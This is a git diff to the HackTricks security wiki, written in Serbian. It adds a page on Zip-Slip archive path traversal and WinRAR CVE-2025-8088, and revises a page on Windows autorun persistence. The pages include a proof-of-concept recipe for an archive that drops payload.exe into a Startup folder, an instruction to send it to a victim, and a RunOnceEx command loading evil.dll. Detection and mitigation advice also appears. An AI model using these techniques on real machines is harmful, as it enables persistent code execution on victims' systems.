diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 68cf84961..bb1d3f659 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -79,6 +79,7 @@ # 🧙‍♂️ Generic Hacking +- [Archive Extraction Path Traversal](generic-hacking/archive-extraction-path-traversal.md) - [Brute Force - CheatSheet](generic-hacking/brute-force.md) - [Esim Javacard Exploitation](generic-hacking/esim-javacard-exploitation.md) - [Exfiltration](generic-hacking/exfiltration.md) diff --git a/src/generic-hacking/archive-extraction-path-traversal.md b/src/generic-hacking/archive-extraction-path-traversal.md new file mode 100644 index 000000000..9dd8003c6 --- /dev/null +++ b/src/generic-hacking/archive-extraction-path-traversal.md @@ -0,0 +1,68 @@ +# Archive Extraction Path Traversal ("Zip-Slip" / WinRAR CVE-2025-8088) + +{{#include ../banners/hacktricks-training.md}} + +## Pregled + +Mnogi formati arhiva (ZIP, RAR, TAR, 7-ZIP, itd.) omogućavaju svakom unosu da nosi svoj **interni put**. Kada alat za ekstrakciju slepo poštuje taj put, kreirano ime datoteke koje sadrži `..` ili **apsolutni put** (npr. `C:\Windows\System32\`) biće zapisano izvan direktorijuma koji je korisnik odabrao. Ova klasa ranjivosti je široko poznata kao *Zip-Slip* ili **prolaz kroz put ekstrakcije arhive**. + +Posledice se kreću od prepisivanja proizvoljnih datoteka do direktnog postizanja **daljinskog izvršavanja koda (RCE)** tako što se isporučuje payload na **auto-run** lokaciju kao što je Windows *Startup* folder. + +## Osnovni uzrok + +1. Napadač kreira arhivu gde jedan ili više zaglavlja datoteka sadrže: +* Relativne sekvence prolaza (`..\..\..\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe`) +* Apsolutne puteve (`C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\payload.exe`) +2. Žrtva ekstraktuje arhivu pomoću ranjivog alata koji veruje ugrađenom putu umesto da ga sanitizuje ili primora ekstrakciju ispod odabranog direktorijuma. +3. Datoteka se zapisuje na lokaciju koju kontroliše napadač i izvršava/učitava se sledeći put kada sistem ili korisnik aktivira taj put. + +## Primer iz stvarnog sveta – WinRAR ≤ 7.12 (CVE-2025-8088) + +WinRAR za Windows (uključujući `rar` / `unrar` CLI, DLL i prenosivi izvor) nije uspeo da validira imena datoteka tokom ekstrakcije. Zlonamerna RAR arhiva koja sadrži unos kao: +```text +..\..\..\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe +``` +bi završio **izvan** odabranog izlaznog direktorijuma i unutar korisničkog *Startup* foldera. Nakon prijavljivanja, Windows automatski izvršava sve što se tamo nalazi, pružajući *persistent* RCE. + +### Izrada PoC arhive (Linux/Mac) +```bash +# Requires rar >= 6.x +mkdir -p "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup" +cp payload.exe "evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/" +rar a -ep evil.rar evil/* +``` +Opcije korišćene: +* `-ep` – čuvanje putanja fajlova tačno onako kako su date (ne **pruning** vodeće `./`). + +Dostavite `evil.rar` žrtvi i uputite ih da ga izvade koristeći ranjivu verziju WinRAR-a. + +### Posmatrana Eksploatacija u Prirodi + +ESET je izvestio o RomCom (Storm-0978/UNC2596) spear-phishing kampanjama koje su priložile RAR arhive koristeći CVE-2025-8088 za implementaciju prilagođenih backdoor-a i olakšavanje operacija ransomware-a. + +## Saveti za Detekciju + +* **Statistička inspekcija** – Nabrojati stavke arhive i označiti bilo koje ime koje sadrži `../`, `..\\`, *apsolutne putanje* (`C:`) ili nekanonske UTF-8/UTF-16 kodiranja. +* **Sandbox ekstrakcija** – Dekompresovati u jednokratni direktorij koristeći *siguran* ekstraktor (npr., Python-ov `patool`, 7-Zip ≥ najnovija verzija, `bsdtar`) i proveriti da li rezultantne putanje ostaju unutar direktorijuma. +* **Praćenje krajnjih tačaka** – Upozoriti na nove izvršne fajlove napisane u `Startup`/`Run` lokacije ubrzo nakon što je arhiva otvorena od strane WinRAR/7-Zip/etc. + +## Ublažavanje i Ojačavanje + +1. **Ažurirajte ekstraktor** – WinRAR 7.13 implementira pravilnu sanitizaciju putanja. Korisnici ga moraju ručno preuzeti jer WinRAR nema mehanizam za automatsko ažuriranje. +2. Ekstraktujte arhive sa **“Ignoriši putanje”** opcijom (WinRAR: *Ekstrakt → "Ne ekstraktuj putanje"*) kada je to moguće. +3. Otvorite nepouzdane arhive **unutar sandbox-a** ili VM-a. +4. Implementirajte beleženje aplikacija i ograničite pristup korisnika za pisanje u auto-radne direktorijume. + +## Dodatni Pogođeni / Istorijski Slučajevi + +* 2018 – Masivno *Zip-Slip* upozorenje od strane Snyk-a koje utiče na mnoge Java/Go/JS biblioteke. +* 2023 – 7-Zip CVE-2023-4011 slična eksploatacija tokom `-ao` spajanja. +* Bilo koja prilagođena logika ekstrakcije koja ne poziva `PathCanonicalize` / `realpath` pre pisanja. + +## Reference + +- [BleepingComputer – WinRAR zero-day iskorišćen za postavljanje malvera prilikom ekstrakcije arhive](https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-phishing-attacks/) +- [WinRAR 7.13 Changelog](https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=283&cHash=a64b4a8f662d3639dec8d65f47bc93c5) +- [Snyk – Zip Slip ranjivost izveštaj](https://snyk.io/research/zip-slip-vulnerability) + +{{#include ../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md index de15d8a75..2a0a95108 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md +++ b/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md @@ -11,7 +11,7 @@ wmic startup get caption,command 2>nul & ^ Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl ``` -## Zakazani zadaci +## Zakazani Zadaci **Zadaci** mogu biti zakazani da se izvršavaju sa **određenom frekvencijom**. Pogledajte koji su binarni fajlovi zakazani za izvršavanje sa: ```bash @@ -26,7 +26,7 @@ schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgro ``` ## Fascikle -Sve binarne datoteke smeštene u **Startup fascikle će biti izvršene prilikom pokretanja**. Uobičajene startup fascikle su one navedene u nastavku, ali je startup fascikla označena u registru. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path) +Sve binarne datoteke smeštene u **Startup fascikle će biti izvršene prilikom pokretanja**. Uobičajene startup fascikle su one navedene u nastavku, ali startup fascikla je označena u registru. [Read this to learn where.](privilege-escalation-with-autorun-binaries.md#startup-path) ```bash dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul @@ -35,10 +35,18 @@ dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" ``` +> **FYI**: Ranjenje arhiva *putanja prolaza* ranjivosti (kao što je ona zloupotrebljena u WinRAR-u pre 7.13 – CVE-2025-8088) može se iskoristiti za **deponovanje payload-a direktno unutar ovih Startup folder-a tokom dekompresije**, što rezultira izvršavanjem koda prilikom sledećeg prijavljivanja korisnika. Za detaljno objašnjenje ove tehnike pogledajte: + +{{#ref}} +../../generic-hacking/archive-extraction-path-traversal.md +{{#endref}} + + + ## Registry -> [!NOTE] -> [Napomena odavde](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** registracioni unos ukazuje da koristite 64-bitnu verziju Windows-a. Operativni sistem koristi ovaj ključ da prikaže odvojeni prikaz HKEY_LOCAL_MACHINE\SOFTWARE za 32-bitne aplikacije koje se pokreću na 64-bitnim verzijama Windows-a. +> [!TIP] +> [Napomena odavde](https://answers.microsoft.com/en-us/windows/forum/all/delete-registry-key/d425ae37-9dcc-4867-b49c-723dcd15147f): **Wow6432Node** registracijski unos ukazuje da koristite 64-bitnu verziju Windows-a. Operativni sistem koristi ovaj ključ da prikaže odvojeni prikaz HKEY_LOCAL_MACHINE\SOFTWARE za 32-bitne aplikacije koje se pokreću na 64-bitnim verzijama Windows-a. ### Runs @@ -58,7 +66,7 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" Registri ključevi poznati kao **Run** i **RunOnce** su dizajnirani da automatski izvršavaju programe svaki put kada se korisnik prijavi u sistem. Komandna linija dodeljena kao podatkovna vrednost ključa je ograničena na 260 karaktera ili manje. -**Service runs** (mogu kontrolisati automatsko pokretanje servisa tokom podizanja sistema): +**Servisni runs** (mogu kontrolisati automatsko pokretanje servisa tokom podizanja sistema): - `HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce` - `HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce` @@ -74,15 +82,15 @@ Registri ključevi poznati kao **Run** i **RunOnce** su dizajnirani da automatsk - `HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx` - `HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx` -Na Windows Vista i novijim verzijama, **Run** i **RunOnce** registri se ne generišu automatski. Unosi u ovim ključevima mogu ili direktno pokrenuti programe ili ih odrediti kao zavisnosti. Na primer, da bi se učitao DLL fajl prilikom prijavljivanja, može se koristiti **RunOnceEx** registri ključ zajedno sa "Depend" ključem. Ovo se demonstrira dodavanjem registracionog unosa za izvršavanje "C:\temp\evil.dll" tokom pokretanja sistema: +Na Windows Vista i novijim verzijama, **Run** i **RunOnce** registri se ne generišu automatski. Unosi u ovim ključevima mogu ili direktno pokrenuti programe ili ih odrediti kao zavisnosti. Na primer, da bi se učitao DLL fajl prilikom prijavljivanja, može se koristiti **RunOnceEx** registri ključ zajedno sa "Depend" ključem. Ovo se demonstrira dodavanjem registracijskog unosa za izvršavanje "C:\temp\evil.dll" tokom pokretanja sistema: ``` reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll" ``` -> [!NOTE] +> [!TIP] > **Eksploit 1**: Ako možete da pišete unutar bilo kog od pomenutih registra unutar **HKLM**, možete da eskalirate privilegije kada se drugi korisnik prijavi. -> [!NOTE] -> **Eksploit 2**: Ako možete da prepišete bilo koji od binarnih fajlova navedenih u bilo kom od registra unutar **HKLM**, možete da modifikujete taj binarni fajl sa backdoor-om kada se drugi korisnik prijavi i eskalirate privilegije. +> [!TIP] +> **Eksploit 2**: Ako možete da prepišete bilo koji od binarnih fajlova navedenih u bilo kom registru unutar **HKLM**, možete da modifikujete taj binarni fajl sa backdoor-om kada se drugi korisnik prijavi i eskalirate privilegije. ```bash #CMD reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run @@ -145,10 +153,10 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\Ru - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders` - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders` -Prečice postavljene u **Startup** folder će automatski pokrenuti servise ili aplikacije tokom prijavljivanja korisnika ili ponovnog pokretanja sistema. Lokacija **Startup** foldera je definisana u registru za **Local Machine** i **Current User** opsege. To znači da će svaka prečica dodata ovim specificiranim **Startup** lokacijama osigurati da se povezani servis ili program pokrene nakon procesa prijavljivanja ili ponovnog pokretanja, što ga čini jednostavnom metodom za zakazivanje programa da se automatski pokreću. +Prečice postavljene u **Startup** folder će automatski pokrenuti usluge ili aplikacije tokom prijavljivanja korisnika ili ponovnog pokretanja sistema. Lokacija **Startup** foldera je definisana u registru za **Local Machine** i **Current User** opsege. To znači da će svaka prečica dodata ovim specificiranim **Startup** lokacijama osigurati da se povezani servis ili program pokrene nakon procesa prijavljivanja ili ponovnog pokretanja, što ga čini jednostavnom metodom za zakazivanje programa da se automatski pokreću. -> [!NOTE] -> Ako možete da prepišete bilo koji \[User] Shell Folder pod **HKLM**, moći ćete da ga usmerite na folder koji kontrolišete i postavite backdoor koji će se izvršiti svaki put kada se korisnik prijavi na sistem, čime se eskaliraju privilegije. +> [!TIP] +> Ako možete da prepišete bilo koji \[User] Shell Folder pod **HKLM**, moći ćete da ga usmerite na folder koji kontrolišete i postavite backdoor koji će se izvršiti svaki put kada se korisnik prijavi u sistem, čime se povećavaju privilegije. ```bash reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup" reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup" @@ -171,8 +179,8 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit" Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell" ``` -> [!NOTE] -> Ako možete da prepišete vrednost registra ili binarni fajl, moći ćete da eskalirate privilegije. +> [!TIP] +> Ako možete da prepišete vrednost registra ili binarni fajl, moći ćete da podignete privilegije. ### Podešavanja politike @@ -192,7 +200,7 @@ Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion U Windows Registry-ju pod `HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot`, postoji **`AlternateShell`** vrednost koja je podrazumevano postavljena na `cmd.exe`. To znači da kada izaberete "Safe Mode with Command Prompt" tokom pokretanja (pritiskom na F8), koristi se `cmd.exe`. Međutim, moguće je postaviti vaš računar da se automatski pokreće u ovom režimu bez potrebe da pritisnete F8 i ručno ga izaberete. -Koraci za kreiranje opcije za pokretanje koja automatski startuje u "Safe Mode with Command Prompt": +Koraci za kreiranje opcije za pokretanje u "Safe Mode with Command Prompt": 1. Promenite atribute `boot.ini` datoteke da uklonite read-only, system i hidden oznake: `attrib c:\boot.ini -r -s -h` 2. Otvorite `boot.ini` za uređivanje. @@ -200,9 +208,9 @@ Koraci za kreiranje opcije za pokretanje koja automatski startuje u "Safe Mode w 4. Sačuvajte promene u `boot.ini`. 5. Ponovo primenite originalne atribute datoteke: `attrib c:\boot.ini +r +s +h` -- **Eksploit 1:** Promena **AlternateShell** registry ključa omogućava prilagođenu postavku komandne ljuske, potencijalno za neovlašćen pristup. -- **Eksploit 2 (PATH Write Permissions):** Imati dozvole za pisanje u bilo koji deo sistema **PATH** promenljive, posebno pre `C:\Windows\system32`, omogućava vam da izvršite prilagođeni `cmd.exe`, što bi mogla biti zadnja vrata ako se sistem pokrene u Safe Mode. -- **Eksploit 3 (PATH i boot.ini Write Permissions):** Pristup za pisanje u `boot.ini` omogućava automatsko pokretanje u Safe Mode, olakšavajući neovlašćen pristup prilikom sledećeg ponovnog pokretanja. +- **Eksploatacija 1:** Promena **AlternateShell** registry ključa omogućava prilagođenu postavku komandne ljuske, potencijalno za neovlašćen pristup. +- **Eksploatacija 2 (PATH Write Permissions):** Imati dozvole za pisanje u bilo koji deo sistema **PATH** promenljive, posebno pre `C:\Windows\system32`, omogućava vam da izvršite prilagođeni `cmd.exe`, što bi mogla biti zadnja vrata ako se sistem pokrene u Safe Mode. +- **Eksploatacija 3 (PATH i boot.ini Write Permissions):** Pristup za pisanje u `boot.ini` omogućava automatsko pokretanje u Safe Mode, olakšavajući neovlašćen pristup prilikom sledećeg ponovnog pokretanja. Da proverite trenutnu **AlternateShell** postavku, koristite ove komande: ```bash @@ -211,7 +219,7 @@ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Co ``` ### Instalirana Komponenta -Active Setup je funkcija u Windows-u koja **pokreće pre nego što se radno okruženje potpuno učita**. Prioritizuje izvršavanje određenih komandi, koje moraju biti završene pre nego što se prijava korisnika nastavi. Ovaj proces se dešava čak i pre nego što se aktiviraju drugi startni unosi, kao što su oni u Run ili RunOnce registrima. +Active Setup je funkcija u Windows-u koja **pokreće pre nego što se radno okruženje potpuno učita**. Prioritizuje izvršavanje određenih komandi, koje moraju biti završene pre nego što se prijavljivanje korisnika nastavi. Ovaj proces se dešava čak i pre nego što se aktiviraju drugi startni unosi, kao što su oni u Run ili RunOnce registrima. Active Setup se upravlja kroz sledeće registre: @@ -232,7 +240,7 @@ Unutar ovih ključeva postoje različiti podključevi, od kojih svaki odgovara s - Modifikovanje ili pisanje u ključ gde je **`IsInstalled`** postavljeno na `"1"` sa specifičnim **`StubPath`** može dovesti do neovlašćenog izvršavanja komandi, potencijalno za eskalaciju privilegija. - Menjanje binarnog fajla na koji se poziva u bilo kojoj **`StubPath`** vrednosti takođe može postići eskalaciju privilegija, uz dovoljno dozvola. -Da biste pregledali **`StubPath`** konfiguracije širom Active Setup komponenti, mogu se koristiti sledeće komande: +Da biste pregledali konfiguracije **`StubPath`** u Active Setup komponentama, mogu se koristiti sledeće komande: ```bash reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath @@ -241,20 +249,20 @@ reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components ``` ### Browser Helper Objects -### Pregled Browser Helper Objects (BHO) +### Overview of Browser Helper Objects (BHOs) -Browser Helper Objects (BHO) su DLL moduli koji dodaju dodatne funkcije Microsoftovom Internet Exploreru. Učitavaju se u Internet Explorer i Windows Explorer pri svakom pokretanju. Ipak, njihovo izvršavanje može biti blokirano postavljanjem **NoExplorer** ključa na 1, sprečavajući ih da se učitavaju sa instancama Windows Explorera. +Browser Helper Objects (BHOs) su DLL moduli koji dodaju dodatne funkcije Microsoftovom Internet Exploreru. Učitavaju se u Internet Explorer i Windows Explorer pri svakom pokretanju. Ipak, njihovo izvršavanje može biti blokirano postavljanjem **NoExplorer** ključa na 1, sprečavajući ih da se učitavaju sa instancama Windows Explorera. -BHO su kompatibilni sa Windows 10 putem Internet Explorer 11, ali nisu podržani u Microsoft Edge, podrazumevanom pretraživaču u novijim verzijama Windows-a. +BHOs su kompatibilni sa Windows 10 putem Internet Explorer 11, ali nisu podržani u Microsoft Edge, podrazumevanom pretraživaču u novijim verzijama Windows-a. -Da biste istražili BHO registrovane na sistemu, možete pregledati sledeće registre: +Da biste istražili BHOs registrovane na sistemu, možete pregledati sledeće registry ključeve: - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects` - `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects` Svaki BHO je predstavljen svojim **CLSID** u registru, koji služi kao jedinstveni identifikator. Detaljne informacije o svakom CLSID-u mogu se naći pod `HKLM\SOFTWARE\Classes\CLSID\{}`. -Za upit BHO u registru, mogu se koristiti sledeće komande: +Za upit BHOs u registru, mogu se koristiti sledeće komande: ```bash reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s @@ -276,7 +284,7 @@ reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Dr Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers' Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers' ``` -### Otvorite komandu +### Otvorena Komanda - `HKLM\SOFTWARE\Classes\htmlfile\shell\open\command` - `HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command` @@ -299,7 +307,7 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula ``` ## Više -**Pronađite više Autoruns kao što su registri u** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2) +**Pronađite više Autoruns kao što su registri na** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2) ## Reference